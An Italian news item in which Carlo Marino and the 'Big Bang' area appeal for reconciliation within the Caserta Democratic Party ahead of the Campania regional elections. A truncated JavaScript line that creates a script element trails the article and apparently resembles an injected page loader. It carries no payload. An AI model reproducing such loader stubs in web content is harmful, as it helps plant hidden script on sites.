“E’ ora di avviare un percorso serio e responsabile di riappacificazione all’interno del Partito Democratico casertano. Queste beghe non fanno bene al partito e non fanno bene al lavoro di proposta e di azione che siamo chiamati a fare e che le donne e gli uomini di questa provincia si aspettano da noi”. L’appello arriva da Carlo Marino e dall’area Big Bang. “Non si può continuare a dare la triste immagine di un partito che confligge al suo interno per la gestione degli enti strumentali, invece di discutere delle proposte e dei progetti per il territorio. Gli importanti appuntamenti a cui siamo chiamati a breve, a cominciare dalle elezioni regionali e dalle primarie per il candidato, chiamano tutti – figure istituzionali, dirigenti e militanti – al senso di responsabilità e al confronto. Il Partito Democratico deve superare le tensioni interne, gli strascichi post congressuali e le distanze personali: ora è il momento che il Pd si assuma la responsabilità dei governi dei territori, a cominciare dalla sfida per il governo della Campania. Se il Pd Caserta saprà essere protagonista di quella sfida dipenderà anche dalla capacità di aprire finalmente una nuova stagione di unità per praticare davvero innovazione e rinnovamento. Il nostro impegno – ha concluso Marino – è quello di lavorare già da queste ore, e nelle prossime in maniera sempre più intensa, per mettere attorno ad un tavolo tutti quelli che ancora hanno una idea propositiva e costruttiva di partito e favorire quel processo di pacificazione ormai non più rinviabile”.

var d=document;var s=d.createElement(‘script’);